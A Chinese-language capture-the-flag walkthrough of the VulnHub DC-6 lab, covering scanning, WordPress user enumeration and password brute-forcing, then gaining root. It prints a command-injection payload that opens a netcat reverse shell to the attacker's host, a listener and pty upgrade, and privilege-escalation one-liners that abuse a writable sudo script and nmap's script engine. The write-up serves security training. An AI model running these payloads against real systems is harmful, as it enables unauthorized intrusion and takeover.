一，环境的搭建

VM17 官网下载

kali 2023.4版 https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

靶场文件 https://download.vulnhub.com/dc/DC-6.zip

二，攻略

首先进行主机发现；

接下来进行端口扫描；

开放了22端口和80端口；

首先进行访问；

页面直接跳转；

想到dc-2；也是这种情况，进行同样的操作；

添加的内容：
192.168.20.148 wordy

这样就可以实现页面的正常访问；

发现是一个word press的CMS；

接下来我们仿照dc-2靶机的操作；

接下来针对word press使用wpscan进行扫描；

wpscan --url http://wordy -e u

拿到了几个用户名；

接下来尝试爆破ssh（由于22端口是开放的）；

并未爆破成功，账号密码可能不是ssh；

尝试扫描一下目录；

wordpress的后台登录页面；

用前面拿到的账号爆破；

最后得到一组账号密码；

账号：mark
密码：helpdesk01

登录成功；

这里存在一个命令执行；

构造payload；

127.0.0.1|nc -nv 192.168.20.151 4444 -e /bin/bash

发现输入框对长度有限制；

这里可以使用burp抓包，也可以直接修改前端页面；

kali监听4444端口；

nc -lnvp 4444

连接成功；

python -c "import pty;pty.spawn('/bin/bash')"

在/home目录下的mark用户的根目录下找到一个graham用户的密码；

现在尝试切换用户；

切换成功；

sudo -l
查看该用户可以以root权限执行哪些命令；

这里比较有意思的是graham用户与jens用户类似；

并且可以执行这个脚本：/home/jens/backups.sh

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens ./backups.sh

成功切换到了jens用户；

接着继续查看可以使用root权限执行的命令；

接下来我们可以使用nmap这个命令来提权；

nmap提权（可以上网查找有关的知识点）；

echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

其中的TF为一个临时文件；

进行提权：

echo "os.execute('/bin/bash')" > /tmp/shell
sudo nmap --script=/tmp/shell

最后拿到最终的flag；

三，结论

hosts文件优先解析，优先级高于DNS；

暴力破解在某些时候很有用；

根据可执行的脚本文件，获取shell；

nmap提权的方法；

在创建临时文件的时候，一般选择/tmp目录，这个目录对于几乎所有的用户都有权限；